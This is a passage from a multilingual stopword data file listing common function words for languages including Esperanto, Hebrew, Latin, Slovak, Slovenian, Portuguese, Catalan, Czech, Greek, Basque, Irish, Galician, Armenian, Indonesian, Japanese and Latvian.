"havas",
"havis",
"havos",
"havu",
"havus",
"he",
"ho",
"hu",
"ili",
"ilia",
"ilian",
"ilin",
"inter",
"io",
"ion",
"iu",
"iujn",
"iun",
"ja",
"jam",
"je",
"jes",
"k",
"kaj",
"ke",
"kio",
"kion",
"kiu",
"kiujn",
"kiun",
"kvankam",
"kvar",
"kvara",
"kvazaŭ",
"kvin",
"kvina",
"la",
"li",
"lia",
"lian",
"lin",
"malantaŭ",
"male",
"malgraŭ",
"mem",
"mi",
"mia",
"mian",
"min",
"minus",
"naŭ",
"naŭa",
"ne",
"nek",
"nenio",
"nenion",
"neniu",
"neniun",
"nepre",
"ni",
"nia",
"nian",
"nin",
"nu",
"nun",
"nur",
"ok",
"oka",
"oni",
"onia",
"onian",
"onin",
"plej",
"pli",
"plu",
"plus",
"por",
"post",
"preter",
"s-no",
"s-ro",
"se",
"sed",
"sep",
"sepa",
"ses",
"sesa",
"si",
"sia",
"sian",
"sin",
"sinjor'",
"sinjorino",
"sinjoro",
"sub",
"super",
"supren",
"sur",
"tamen",
"tio",
"tion",
"tiu",
"tiujn",
"tiun",
"tra",
"tri",
"tria",
"tuj",
"tute",
"unu",
"unua",
"ve",
"verŝajne",
"vi",
"via",
"vian",
"vin",
"ĉi",
"ĉio",
"ĉion",
"ĉiu",
"ĉiujn",
"ĉiun",
"ĉu",
"ĝi",
"ĝia",
"ĝian",
"ĝin",
"ĝis",
"ĵus",
"ŝi",
"ŝia",
"ŝin",
],
"he": [
"אבל",
"או",
"אולי",
"אותה",
"אותו",
"אותי",
"אותך",
"אותם",
"אותן",
"אותנו",
"אז",
"אחר",
"אחרות",
"אחרי",
"אחריכן",
"אחרים",
"אחרת",
"אי",
"איזה",
"איך",
"אין",
"איפה",
"איתה",
"איתו",
"איתי",
"איתך",
"איתכם",
"איתכן",
"איתם",
"איתן",
"איתנו",
"אך",
"אל",
"אלה",
"אלו",
"אם",
"אנחנו",
"אני",
"אס",
"אף",
"אצל",
"אשר",
"את",
"אתה",
"אתכם",
"אתכן",
"אתם",
"אתן",
"באיזומידה",
"באמצע",
"באמצעות",
"בגלל",
"בין",
"בלי",
"במידה",
"במקוםשבו",
"ברם",
"בשביל",
"בשעהש",
"בתוך",
"גם",
"דרך",
"הוא",
"היא",
"היה",
"היכן",
"היתה",
"היתי",
"הם",
"הן",
"הנה",
"הסיבהשבגללה",
"הרי",
"ואילו",
"ואת",
"זאת",
"זה",
"זות",
"יהיה",
"יוכל",
"יוכלו",
"יותרמדי",
"יכול",
"יכולה",
"יכולות",
"יכולים",
"יכל",
"יכלה",
"יכלו",
"יש",
"כאן",
"כאשר",
"כולם",
"כולן",
"כזה",
"כי",
"כיצד",
"כך",
"ככה",
"כל",
"כלל",
"כמו",
"כן",
"כפי",
"כש",
"לא",
"לאו",
"לאיזותכלית",
"לאן",
"לבין",
"לה",
"להיות",
"להם",
"להן",
"לו",
"לי",
"לכם",
"לכן",
"למה",
"למטה",
"למעלה",
"למקוםשבו",
"למרות",
"לנו",
"לעבר",
"לעיכן",
"לפיכך",
"לפני",
"מאד",
"מאחורי",
"מאיזוסיבה",
"מאין",
"מאיפה",
"מבלי",
"מבעד",
"מדוע",
"מה",
"מהיכן",
"מול",
"מחוץ",
"מי",
"מכאן",
"מכיוון",
"מלבד",
"מן",
"מנין",
"מסוגל",
"מעט",
"מעטים",
"מעל",
"מצד",
"מקוםבו",
"מתחת",
"מתי",
"נגד",
"נגר",
"נו",
"עד",
"עז",
"על",
"עלי",
"עליה",
"עליהם",
"עליהן",
"עליו",
"עליך",
"עליכם",
"עלינו",
"עם",
"עצמה",
"עצמהם",
"עצמהן",
"עצמו",
"עצמי",
"עצמם",
"עצמן",
"עצמנו",
"פה",
"רק",
"שוב",
"של",
"שלה",
"שלהם",
"שלהן",
"שלו",
"שלי",
"שלך",
"שלכה",
"שלכם",
"שלכן",
"שלנו",
"שם",
"תהיה",
"תחת",
],
"la": [
"a",
"ab",
"ac",
"ad",
"at",
"atque",
"aut",
"autem",
"cum",
"de",
"dum",
"e",
"erant",
"erat",
"est",
"et",
"etiam",
"ex",
"haec",
"hic",
"hoc",
"in",
"ita",
"me",
"nec",
"neque",
"non",
"per",
"qua",
"quae",
"quam",
"qui",
"quibus",
"quidem",
"quo",
"quod",
"re",
"rebus",
"rem",
"res",
"sed",
"si",
"sic",
"sunt",
"tamen",
"tandem",
"te",
"ut",
"vel",
],
"sk": [
"a",
"aby",
"aj",
"ako",
"aký",
"ale",
"alebo",
"ani",
"avšak",
"ba",
"bez",
"buï",
"cez",
"do",
"ho",
"hoci",
"i",
"ich",
"im",
"ja",
"jeho",
"jej",
"jemu",
"ju",
"k",
"kam",
"kde",
"kedže",
"keï",
"kto",
"ktorý",
"ku",
"lebo",
"ma",
"mi",
"mne",
"mnou",
"mu",
"my",
"mòa",
"môj",
"na",
"nad",
"nami",
"neho",
"nej",
"nemu",
"nich",
"nielen",
"nim",
"no",
"nám",
"nás",
"náš",
"ním",
"o",
"od",
"on",
"ona",
"oni",
"ono",
"ony",
"po",
"pod",
"pre",
"pred",
"pri",
"s",
"sa",
"seba",
"sem",
"so",
"svoj",
"taký",
"tam",
"teba",
"tebe",
"tebou",
"tej",
"ten",
"ti",
"tie",
"to",
"toho",
"tomu",
"tou",
"tvoj",
"ty",
"tá",
"tým",
"v",
"vami",
"veï",
"vo",
"vy",
"vám",
"vás",
"váš",
"však",
"z",
"za",
"zo",
"a",
"èi",
"èo",
"èí",
"òom",
"òou",
"òu",
"že",
],
"sl": [
"a",
"ali",
"april",
"avgust",
"b",
"bi",
"bil",
"bila",
"bile",
"bili",
"bilo",
"biti",
"blizu",
"bo",
"bodo",
"bojo",
"bolj",
"bom",
"bomo",
"boste",
"bova",
"boš",
"brez",
"c",
"cel",
"cela",
"celi",
"celo",
"d",
"da",
"daleč",
"dan",
"danes",
"datum",
"december",
"deset",
"deseta",
"deseti",
"deseto",
"devet",
"deveta",
"deveti",
"deveto",
"do",
"dober",
"dobra",
"dobri",
"dobro",
"dokler",
"dol",
"dolg",
"dolga",
"dolgi",
"dovolj",
"drug",
"druga",
"drugi",
"drugo",
"dva",
"dve",
"e",
"eden",
"en",
"ena",
"ene",
"eni",
"enkrat",
"eno",
"etc.",
"f",
"februar",
"g",
"g.",
"ga",
"ga.",
"gor",
"gospa",
"gospod",
"h",
"halo",
"i",
"idr.",
"ii",
"iii",
"in",
"iv",
"ix",
"iz",
"j",
"januar",
"jaz",
"je",
"ji",
"jih",
"jim",
"jo",
"julij",
"junij",
"jutri",
"k",
"kadarkoli",
"kaj",
"kajti",
"kako",
"kakor",
"kamor",
"kamorkoli",
"kar",
"karkoli",
"katerikoli",
"kdaj",
"kdo",
"kdorkoli",
"ker",
"ki",
"kje",
"kjer",
"kjerkoli",
"ko",
"koder",
"koderkoli",
"koga",
"komu",
"kot",
"kratek",
"kratka",
"kratke",
"kratki",
"l",
"lahka",
"lahke",
"lahki",
"lahko",
"le",
"lep",
"lepa",
"lepe",
"lepi",
"lepo",
"leto",
"m",
"maj",
"majhen",
"majhna",
"majhni",
"malce",
"malo",
"manj",
"marec",
"me",
"med",
"medtem",
"mene",
"mesec",
"mi",
"midva",
"midve",
"mnogo",
"moj",
"moja",
"moje",
"mora",
"morajo",
"moram",
"moramo",
"morate",
"moraš",
"morem",
"mu",
"n",
"na",
"nad",
"naj",
"najina",
"najino",
"najmanj",
"naju",
"največ",
"nam",
"narobe",
"nas",
"nato",
"nazaj",
"naš",
"naša",
"naše",
"ne",
"nedavno",
"nedelja",
"nek",
"neka",
"nekaj",
"nekatere",
"nekateri",
"nekatero",
"nekdo",
"neke",
"nekega",
"neki",
"nekje",
"neko",
"nekoga",
"nekoč",
"ni",
"nikamor",
"nikdar",
"nikjer",
"nikoli",
"nič",
"nje",
"njega",
"njegov",
"njegova",
"njegovo",
"njej",
"njemu",
"njen",
"njena",
"njeno",
"nji",
"njih",
"njihov",
"njihova",
"njihovo",
"njiju",
"njim",
"njo",
"njun",
"njuna",
"njuno",
"no",
"nocoj",
"november",
"npr.",
"o",
"ob",
"oba",
"obe",
"oboje",
"od",
"odprt",
"odprta",
"odprti",
"okoli",
"oktober",
"on",
"onadva",
"one",
"oni",
"onidve",
"osem",
"osma",
"osmi",
"osmo",
"oz.",
"p",
"pa",
"pet",
"peta",
"petek",
"peti",
"peto",
"po",
"pod",
"pogosto",
"poleg",
"poln",
"polna",
"polni",
"polno",
"ponavadi",
"ponedeljek",
"ponovno",
"potem",
"povsod",
"pozdravljen",
"pozdravljeni",
"prav",
"prava",
"prave",
"pravi",
"pravo",
"prazen",
"prazna",
"prazno",
"prbl.",
"precej",
"pred",
"prej",
"preko",
"pri",
"pribl.",
"približno",
"primer",
"pripravljen",
"pripravljena",
"pripravljeni",
"proti",
"prva",
"prvi",
"prvo",
"r",
"ravno",
"redko",
"res",
"reč",
"s",
"saj",
"sam",
"sama",
"same",
"sami",
"samo",
"se",
"sebe",
"sebi",
"sedaj",
"sedem",
"sedma",
"sedmi",
"sedmo",
"sem",
"september",
"seveda",
"si",
"sicer",
"skoraj",
"skozi",
"slab",
"smo",
"so",
"sobota",
"spet",
"sreda",
"srednja",
"srednji",
"sta",
"ste",
"stran",
"stvar",
"sva",
"t",
"ta",
"tak",
"taka",
"take",
"taki",
"tako",
"takoj",
"tam",
"te",
"tebe",
"tebi",
"tega",
"težak",
"težka",
"težki",
"težko",
"ti",
"tista",
"tiste",
"tisti",
"tisto",
"tj.",
"tja",
"to",
"toda",
"torek",
"tretja",
"tretje",
"tretji",
"tri",
"tu",
"tudi",
"tukaj",
"tvoj",
"tvoja",
"tvoje",
"u",
"v",
"vaju",
"vam",
"vas",
"vaš",
"vaša",
"vaše",
"ve",
"vedno",
"velik",
"velika",
"veliki",
"veliko",
"vendar",
"ves",
"več",
"vi",
"vidva",
"vii",
"viii",
"visok",
"visoka",
"visoke",
"visoki",
"vsa",
"vsaj",
"vsak",
"vsaka",
"vsakdo",
"vsake",
"vsaki",
"vsakomur",
"vse",
"vsega",
"vsi",
"vso",
"včasih",
"včeraj",
"x",
"z",
"za",
"zadaj",
"zadnji",
"zakaj",
"zaprta",
"zaprti",
"zaprto",
"zdaj",
"zelo",
"zunaj",
"č",
"če",
"često",
"četrta",
"četrtek",
"četrti",
"četrto",
"čez",
"čigav",
"š",
"šest",
"šesta",
"šesti",
"šesto",
"štiri",
"ž",
"že",
],
"br": [
"a",
"ainda",
"alem",
"ambas",
"ambos",
"antes",
"ao",
"aonde",
"aos",
"apos",
"aquele",
"aqueles",
"as",
"assim",
"com",
"como",
"contra",
"contudo",
"cuja",
"cujas",
"cujo",
"cujos",
"da",
"das",
"de",
"dela",
"dele",
"deles",
"demais",
"depois",
"desde",
"desta",
"deste",
"dispoe",
"dispoem",
"diversa",
"diversas",
"diversos",
"do",
"dos",
"durante",
"e",
"ela",
"elas",
"ele",
"eles",
"em",
"entao",
"entre",
"essa",
"essas",
"esse",
"esses",
"esta",
"estas",
"este",
"estes",
"ha",
"isso",
"isto",
"logo",
"mais",
"mas",
"mediante",
"menos",
"mesma",
"mesmas",
"mesmo",
"mesmos",
"na",
"nao",
"nas",
"nem",
"nesse",
"neste",
"nos",
"o",
"os",
"ou",
"outra",
"outras",
"outro",
"outros",
"pelas",
"pelo",
"pelos",
"perante",
"pois",
"por",
"porque",
"portanto",
"propios",
"proprio",
"quais",
"qual",
"qualquer",
"quando",
"quanto",
"que",
"quem",
"quer",
"se",
"seja",
"sem",
"sendo",
"seu",
"seus",
"sob",
"sobre",
"sua",
"suas",
"tal",
"tambem",
"teu",
"teus",
"toda",
"todas",
"todo",
"todos",
"tua",
"tuas",
"tudo",
"um",
"uma",
"umas",
"uns",
],
"ca": [
"a",
"abans",
"ací",
"ah",
"així",
"això",
"al",
"aleshores",
"algun",
"alguna",
"algunes",
"alguns",
"alhora",
"allà",
"allí",
"allò",
"als",
"altra",
"altre",
"altres",
"amb",
"ambdues",
"ambdós",
"apa",
"aquell",
"aquella",
"aquelles",
"aquells",
"aquest",
"aquesta",
"aquestes",
"aquests",
"aquí",
"baix",
"cada",
"cadascuna",
"cadascunes",
"cadascuns",
"cadascú",
"com",
"contra",
"d'un",
"d'una",
"d'unes",
"d'uns",
"dalt",
"de",
"del",
"dels",
"des",
"després",
"dins",
"dintre",
"donat",
"doncs",
"durant",
"e",
"eh",
"el",
"els",
"em",
"en",
"encara",
"ens",
"entre",
"eren",
"es",
"esta",
"estaven",
"esteu",
"està",
"estàvem",
"estàveu",
"et",
"etc",
"ets",
"fins",
"fora",
"gairebé",
"ha",
"han",
"has",
"havia",
"he",
"hem",
"heu",
"hi",
"ho",
"i",
"igual",
"iguals",
"ja",
"l'hi",
"la",
"les",
"li",
"li'n",
"llavors",
"m'he",
"ma",
"mal",
"malgrat",
"mateix",
"mateixa",
"mateixes",
"mateixos",
"me",
"mentre",
"meu",
"meus",
"meva",
"meves",
"molt",
"molta",
"moltes",
"molts",
"mon",
"mons",
"més",
"n'he",
"n'hi",
"ne",
"ni",
"no",
"nogensmenys",
"només",
"nosaltres",
"nostra",
"nostre",
"nostres",
"o",
"oh",
"oi",
"on",
"pas",
"pel",
"pels",
"per",
"perquè",
"però",
"poc",
"poca",
"pocs",
"poques",
"potser",
"propi",
"qual",
"quals",
"quan",
"quant",
"que",
"quelcom",
"qui",
"quin",
"quina",
"quines",
"quins",
"què",
"s'ha",
"s'han",
"sa",
"semblant",
"semblants",
"ses",
"seu",
"seus",
"seva",
"seves",
"si",
"sobre",
"sobretot",
"solament",
"sols",
"son",
"sons",
"sota",
"sou",
"sóc",
"són",
"t'ha",
"t'han",
"t'he",
"ta",
"tal",
"també",
"tampoc",
"tan",
"tant",
"tanta",
"tantes",
"teu",
"teus",
"teva",
"teves",
"ton",
"tons",
"tot",
"tota",
"totes",
"tots",
"un",
"una",
"unes",
"uns",
"us",
"va",
"vaig",
"vam",
"van",
"vas",
"veu",
"vosaltres",
"vostra",
"vostre",
"vostres",
"érem",
"éreu",
"és",
],
"cs": [
"a",
"aby",
"ahoj",
"aj",
"ale",
"anebo",
"ani",
"ano",
"asi",
"aspoň",
"atd",
"atp",
"ačkoli",
"až",
"bez",
"beze",
"blízko",
"bohužel",
"brzo",
"bude",
"budem",
"budeme",
"budete",
"budeš",
"budou",
"budu",
"by",
"byl",
"byla",
"byli",
"bylo",
"byly",
"bys",
"být",
"během",
"chce",
"chceme",
"chcete",
"chceš",
"chci",
"chtít",
"chtějí",
"chut'",
"chuti",
"co",
"což",
"cz",
"daleko",
"další",
"den",
"deset",
"devatenáct",
"devět",
"dnes",
"do",
"dobrý",
"docela",
"dva",
"dvacet",
"dvanáct",
"dvě",
"dál",
"dále",
"děkovat",
"děkujeme",
"děkuji",
"ho",
"hodně",
"i",
"jak",
"jakmile",
"jako",
"jakož",
"jde",
"je",
"jeden",
"jedenáct",
"jedna",
"jedno",
"jednou",
"jedou",
"jeho",
"jehož",
"jej",
"jejich",
"její",
"jelikož",
"jemu",
"jen",
"jenom",
"jestli",
"jestliže",
"ještě",
"jež",
"ji",
"jich",
"jimi",
"jinak",
"jiné",
"již",
"jsem",
"jseš",
"jsi",
"jsme",
"jsou",
"jste",
"já",
"jí",
"jím",
"jíž",
"k",
"kam",
"kde",
"kdo",
"kdy",
"když",
"ke",
"kolik",
"kromě",
"kterou",
"která",
"které",
"který",
"kteří",
"kvůli",
"mají",
"mezi",
"mi",
"mne",
"mnou",
"mně",
"moc",
"mohl",
"mohou",
"moje",
"moji",
"možná",
"musí",
"my",
"má",
"málo",
"mám",
"máme",
"máte",
"máš",
"mé",
"mí",
"mít",
"mě",
"můj",
"může",
"na",
"nad",
"nade",
"napište",
"naproti",
"načež",
"naše",
"naši",
"ne",
"nebo",
"nebyl",
"nebyla",
"nebyli",
"nebyly",
"nedělají",
"nedělá",
"nedělám",
"neděláme",
"neděláte",
"neděláš",
"neg",
"nejsi",
"nejsou",
"nemají",
"nemáme",
"nemáte",
"neměl",
"není",
"nestačí",
"nevadí",
"než",
"nic",
"nich",
"nimi",
"nové",
"nový",
"nula",
"nám",
"námi",
"nás",
"náš",
"ním",
"ně",
"něco",
"nějak",
"někde",
"někdo",
"němu",
"němuž",
"o",
"od",
"ode",
"on",
"ona",
"oni",
"ono",
"ony",
"osm",
"osmnáct",
"pak",
"patnáct",
"po",
"pod",
"podle",
"pokud",
"potom",
"pouze",
"pozdě",
"pořád",
"pravé",
"pro",
"prostě",
"prosím",
"proti",
"proto",
"protože",
"proč",
"první",
"pta",
"pět",
"před",
"přes",
"přese",
"při",
"přičemž",
"re",
"rovně",
"s",
"se",
"sedm",
"sedmnáct",
"si",
"skoro",
"smí",
"smějí",
"snad",
"spolu",
"sta",
"sto",
"strana",
"sté",
"své",
"svých",
"svým",
"svými",
"ta",
"tady",
"tak",
"takhle",
"taky",
"také",
"takže",
"tam",
"tamhle",
"tamhleto",
"tamto",
"tato",
"tebe",
"tebou",
"ted'",
"tedy",
"ten",
"tento",
"teto",
"ti",
"tipy",
"tisíc",
"tisíce",
"to",
"tobě",
"tohle",
"toho",
"tohoto",
"tom",
"tomto",
"tomu",
"tomuto",
"toto",
"trošku",
"tu",
"tuto",
"tvoje",
"tvá",
"tvé",
"tvůj",
"ty",
"tyto",
"téma",
"tím",
"tímto",
"tě",
"těm",
"těmu",
"třeba",
"tři",
"třináct",
"u",
"určitě",
"už",
"v",
"vaše",
"vaši",
"ve",
"vedle",
"večer",
"vlastně",
"vy",
"vám",
"vámi",
"vás",
"váš",
"více",
"však",
"všechno",
"všichni",
"vůbec",
"vždy",
"z",
"za",
"zatímco",
"zač",
"zda",
"zde",
"ze",
"zprávy",
"zpět",
"čau",
"či",
"článku",
"články",
"čtrnáct",
"čtyři",
"šest",
"šestnáct",
"že",
],
"el": [
"αλλα",
"αν",
"αντι",
"απο",
"αυτα",
"αυτεσ",
"αυτη",
"αυτο",
"αυτοι",
"αυτοσ",
"αυτουσ",
"αυτων",
"για",
"δε",
"δεν",
"εαν",
"ειμαι",
"ειμαστε",
"ειναι",
"εισαι",
"ειστε",
"εκεινα",
"εκεινεσ",
"εκεινη",
"εκεινο",
"εκεινοι",
"εκεινοσ",
"εκεινουσ",
"εκεινων",
"ενω",
"επι",
"η",
"θα",
"ισωσ",
"κ",
"και",
"κατα",
"κι",
"μα",
"με",
"μετα",
"μη",
"μην",
"να",
"ο",
"οι",
"ομωσ",
"οπωσ",
"οσο",
"οτι",
"παρα",
"ποια",
"ποιεσ",
"ποιο",
"ποιοι",
"ποιοσ",
"ποιουσ",
"ποιων",
"που",
"προσ",
"πωσ",
"σε",
"στη",
"στην",
"στο",
"στον",
"τα",
"την",
"τησ",
"το",
"τον",
"τοτε",
"του",
"των",
"ωσ",
],
"eu": [
"al",
"anitz",
"arabera",
"asko",
"baina",
"bat",
"batean",
"batek",
"bati",
"batzuei",
"batzuek",
"batzuetan",
"batzuk",
"bera",
"beraiek",
"berau",
"berauek",
"bere",
"berori",
"beroriek",
"beste",
"bezala",
"da",
"dago",
"dira",
"ditu",
"du",
"dute",
"edo",
"egin",
"ere",
"eta",
"eurak",
"ez",
"gainera",
"gu",
"gutxi",
"guzti",
"haiei",
"haiek",
"haietan",
"hainbeste",
"hala",
"han",
"handik",
"hango",
"hara",
"hari",
"hark",
"hartan",
"hau",
"hauei",
"hauek",
"hauetan",
"hemen",
"hemendik",
"hemengo",
"hi",
"hona",
"honek",
"honela",
"honetan",
"honi",
"hor",
"hori",
"horiei",
"horiek",
"horietan",
"horko",
"horra",
"horrek",
"horrela",
"horretan",
"horri",
"hortik",
"hura",
"izan",
"ni",
"noiz",
"nola",
"non",
"nondik",
"nongo",
"nor",
"nora",
"ze",
"zein",
"zen",
"zenbait",
"zenbat",
"zer",
"zergatik",
"ziren",
"zituen",
"zu",
"zuek",
"zuen",
"zuten",
],
"ga": [
"a",
"ach",
"ag",
"agus",
"an",
"aon",
"ar",
"arna",
"as",
"b'",
"ba",
"beirt",
"bhúr",
"caoga",
"ceathair",
"ceathrar",
"chomh",
"chtó",
"chuig",
"chun",
"cois",
"céad",
"cúig",
"cúigear",
"d'",
"daichead",
"dar",
"de",
"deich",
"deichniúr",
"den",
"dhá",
"do",
"don",
"dtí",
"dá",
"dár",
"dó",
"faoi",
"faoin",
"faoina",
"faoinár",
"fara",
"fiche",
"gach",
"gan",
"go",
"gur",
"haon",
"hocht",
"i",
"iad",
"idir",
"in",
"ina",
"ins",
"inár",
"is",
"le",
"leis",
"lena",
"lenár",
"m'",
"mar",
"mo",
"mé",
"na",
"nach",
"naoi",
"naonúr",
"ná",
"ní",
"níor",
"nó",
"nócha",
"ocht",
"ochtar",
"os",
"roimh",
"sa",
"seacht",
"seachtar",
"seachtó",
"seasca",
"seisear",
"siad",
"sibh",
"sinn",
"sna",
"sé",
"sí",
"tar",
"thar",
"thú",
"triúr",
"trí",
"trína",
"trínár",
"tríocha",
"tú",
"um",
"ár",
"é",
"éis",
"í",
"ó",
"ón",
"óna",
"ónár",
],
"gl": [
"a",
"alí",
"ao",
"aos",
"aquel",
"aquela",
"aquelas",
"aqueles",
"aquilo",
"aquí",
"as",
"así",
"aínda",
"ben",
"cando",
"che",
"co",
"coa",
"coas",
"comigo",
"con",
"connosco",
"contigo",
"convosco",
"cos",
"cun",
"cunha",
"cunhas",
"cuns",
"da",
"dalgunha",
"dalgunhas",
"dalgún",
"dalgúns",
"das",
"de",
"del",
"dela",
"delas",
"deles",
"desde",
"deste",
"do",
"dos",
"dun",
"dunha",
"dunhas",
"duns",
"e",
"el",
"ela",
"elas",
"eles",
"en",
"era",
"eran",
"esa",
"esas",
"ese",
"eses",
"esta",
"estaba",
"estar",
"este",
"estes",
"estiven",
"estou",
"está",
"están",
"eu",
"facer",
"foi",
"foron",
"fun",
"había",
"hai",
"iso",
"isto",
"la",
"las",
"lle",
"lles",
"lo",
"los",
"mais",
"me",
"meu",
"meus",
"min",
"miña",
"miñas",
"moi",
"na",
"nas",
"neste",
"nin",
"no",
"non",
"nos",
"nosa",
"nosas",
"noso",
"nosos",
"nun",
"nunha",
"nunhas",
"nuns",
"nós",
"o",
"os",
"ou",
"para",
"pero",
"pode",
"pois",
"pola",
"polas",
"polo",
"polos",
"por",
"que",
"se",
"senón",
"ser",
"seu",
"seus",
"sexa",
"sido",
"sobre",
"súa",
"súas",
"tamén",
"tan",
"te",
"ten",
"ter",
"teu",
"teus",
"teñen",
"teño",
"ti",
"tido",
"tiven",
"tiña",
"túa",
"túas",
"un",
"unha",
"unhas",
"uns",
"vos",
"vosa",
"vosas",
"voso",
"vosos",
"vós",
"á",
"é",
"ó",
"ós",
],
"hy": [
"այդ",
"այլ",
"այն",
"այս",
"դու",
"դուք",
"եմ",
"են",
"ենք",
"ես",
"եք",
"է",
"էի",
"էին",
"էինք",
"էիր",
"էիք",
"էր",
"ըստ",
"թ",
"ի",
"ին",
"իսկ",
"իր",
"կամ",
"համար",
"հետ",
"հետո",
"մենք",
"մեջ",
"մի",
"ն",
"նա",
"նաև",
"նրա",
"նրանք",
"որ",
"որը",
"որոնք",
"որպես",
"ու",
"ում",
"պիտի",
"վրա",
"և",
],
"id": [
"ada",
"adalah",
"adanya",
"adapun",
"agak",
"agaknya",
"agar",
"akan",
"akankah",
"akhirnya",
"aku",
"akulah",
"amat",
"amatlah",
"anda",
"andalah",
"antar",
"antara",
"antaranya",
"apa",
"apaan",
"apabila",
"apakah",
"apalagi",
"apatah",
"atau",
"ataukah",
"ataupun",
"bagai",
"bagaikan",
"bagaimana",
"bagaimanakah",
"bagaimanapun",
"bagi",
"bahkan",
"bahwa",
"bahwasanya",
"banyak",
"beberapa",
"begini",
"beginian",
"beginikah",
"beginilah",
"begitu",
"begitukah",
"begitulah",
"begitupun",
"belum",
"belumlah",
"berapa",
"berapakah",
"berapalah",
"berapapun",
"bermacam",
"bersama",
"betulkah",
"biasa",
"biasanya",
"bila",
"bilakah",
"bisa",
"bisakah",
"boleh",
"bolehkah",
"bolehlah",
"buat",
"bukan",
"bukankah",
"bukanlah",
"bukannya",
"cuma",
"dahulu",
"dalam",
"dan",
"dapat",
"dari",
"daripada",
"dekat",
"demi",
"demikian",
"demikianlah",
"dengan",
"depan",
"di",
"dia",
"dialah",
"diantara",
"diantaranya",
"dikarenakan",
"dini",
"diri",
"dirinya",
"disini",
"disinilah",
"dong",
"dulu",
"enggak",
"enggaknya",
"entah",
"entahlah",
"hal",
"hampir",
"hanya",
"hanyalah",
"harus",
"haruslah",
"harusnya",
"hendak",
"hendaklah",
"hendaknya",
"hingga",
"ia",
"ialah",
"ibarat",
"ingin",
"inginkah",
"inginkan",
"ini",
"inikah",
"inilah",
"itu",
"itukah",
"itulah",
"jangan",
"jangankan",
"janganlah",
"jika",
"jikalau",
"juga",
"justru",
"kala",
"kalau",
"kalaulah",
"kalaupun",
"kalian",
"kami",
"kamilah",
"kamu",
"kamulah",
"kan",
"kapan",
"kapankah",
"kapanpun",
"karena",
"karenanya",
"ke",
"kecil",
"kemudian",
"kenapa",
"kepada",
"kepadanya",
"ketika",
"khususnya",
"kini",
"kinilah",
"kiranya",
"kita",
"kitalah",
"kok",
"lagi",
"lagian",
"lah",
"lain",
"lainnya",
"lalu",
"lama",
"lamanya",
"lebih",
"macam",
"maka",
"makanya",
"makin",
"malah",
"malahan",
"mampu",
"mampukah",
"mana",
"manakala",
"manalagi",
"masih",
"masihkah",
"masing",
"mau",
"maupun",
"melainkan",
"melalui",
"memang",
"mengapa",
"mereka",
"merekalah",
"merupakan",
"meski",
"meskipun",
"mungkin",
"mungkinkah",
"nah",
"namun",
"nanti",
"nantinya",
"nyaris",
"oleh",
"olehnya",
"pada",
"padahal",
"padanya",
"paling",
"pantas",
"para",
"pasti",
"pastilah",
"per",
"percuma",
"pernah",
"pula",
"pun",
"rupanya",
"saat",
"saatnya",
"saja",
"sajalah",
"saling",
"sama",
"sambil",
"sampai",
"sana",
"sangat",
"sangatlah",
"saya",
"sayalah",
"se",
"sebab",
"sebabnya",
"sebagai",
"sebagaimana",
"sebagainya",
"sebaliknya",
"sebanyak",
"sebegini",
"sebegitu",
"sebelum",
"sebelumnya",
"sebenarnya",
"seberapa",
"sebetulnya",
"sebisanya",
"sebuah",
"sedang",
"sedangkan",
"sedemikian",
"sedikit",
"sedikitnya",
"segala",
"segalanya",
"segera",
"seharusnya",
"sehingga",
"sejak",
"sejenak",
"sekali",
"sekalian",
"sekaligus",
"sekalipun",
"sekarang",
"seketika",
"sekiranya",
"sekitar",
"sekitarnya",
"sela",
"selagi",
"selain",
"selaku",
"selalu",
"selama",
"selamanya",
"seluruh",
"seluruhnya",
"semacam",
"semakin",
"semasih",
"semaunya",
"sementara",
"sempat",
"semua",
"semuanya",
"semula",
"sendiri",
"sendirinya",
"seolah",
"seorang",
"sepanjang",
"sepantasnya",
"sepantasnyalah",
"seperti",
"sepertinya",
"sering",
"seringnya",
"serta",
"serupa",
"sesaat",
"sesama",
"sesegera",
"sesekali",
"seseorang",
"sesuatu",
"sesuatunya",
"sesudah",
"sesudahnya",
"setelah",
"seterusnya",
"setiap",
"setidaknya",
"sewaktu",
"siapa",
"siapakah",
"siapapun",
"sini",
"sinilah",
"suatu",
"sudah",
"sudahkah",
"sudahlah",
"supaya",
"tadi",
"tadinya",
"tak",
"tanpa",
"tapi",
"telah",
"tentang",
"tentu",
"tentulah",
"tentunya",
"terdiri",
"terhadap",
"terhadapnya",
"terlalu",
"terlebih",
"tersebut",
"tersebutlah",
"tertentu",
"tetapi",
"tiap",
"tidak",
"tidakkah",
"tidaklah",
"toh",
"waduh",
"wah",
"wahai",
"walau",
"walaupun",
"wong",
"yaitu",
"yakni",
"yang",
],
"ja": [
"あっ",
"あり",
"ある",
"い",
"いう",
"いる",
"う",
"うち",
"お",
"および",
"おり",
"か",
"かつて",
"から",
"が",
"き",
"ここ",
"こと",
"この",
"これ",
"これら",
"さ",
"さらに",
"し",
"しかし",
"する",
"ず",
"せ",
"せる",
"そして",
"その",
"その他",
"その後",
"それ",
"それぞれ",
"た",
"ただし",
"たち",
"ため",
"たり",
"だ",
"だっ",
"つ",
"て",
"で",
"でき",
"できる",
"です",
"では",
"でも",
"と",
"という",
"といった",
"とき",
"ところ",
"として",
"とともに",
"とも",
"と共に",
"な",
"ない",
"なお",
"なかっ",
"ながら",
"なく",
"なっ",
"など",
"なら",
"なり",
"なる",
"に",
"において",
"における",
"について",
"にて",
"によって",
"により",
"による",
"に対して",
"に対する",
"に関する",
"の",
"ので",
"のみ",
"は",
"ば",
"へ",
"ほか",
"ほとんど",
"ほど",
"ます",
"また",
"または",
"まで",
"も",
"もの",
"ものの",
"や",
"よう",
"より",
"ら",
"られ",
"られる",
"れ",
"れる",
"を",
"ん",
"及び",
"特に",
],
"lv": [
"aiz",
"ap",
"apakš",
"apakšpus",
"ar",
"arī",
"augšpus",
"bet",
"bez",
"bija",
"biji",
"biju",
"bijām",
"bijāt",
"būs",
"būsi",
"būsiet",
"būsim",
"būt",
"būšu",
"caur",
"diemžēl",
"diezin",
"droši",
"dēļ",
"esam",
"esat",
"esi",
"esmu",
"gan",
"gar",
"iekam",
"iekams",
"iekām",
"iekāms",
"iekš",
"iekšpus",
"ik",
"ir",
"it",
"itin",
"iz",
"ja",
"jau",
"jeb",
"jebšu",
"jel",
"jo",
"jā",
"ka",
"kamēr",
"kaut",
"kolīdz",
"kopš",
"kā",
"kļuva",
"kļuvi",
"kļuvu",
"kļuvām",
"kļuvāt",
"kļūs",
"kļūsi",
"kļūsiet",
"kļūsim",
"kļūst",
"kļūstam",
"kļūstat",
"kļūsti",
"kļūstu",
"kļūt",
"kļūšu",
"labad",
"lai",
"lejpus",
"līdz",
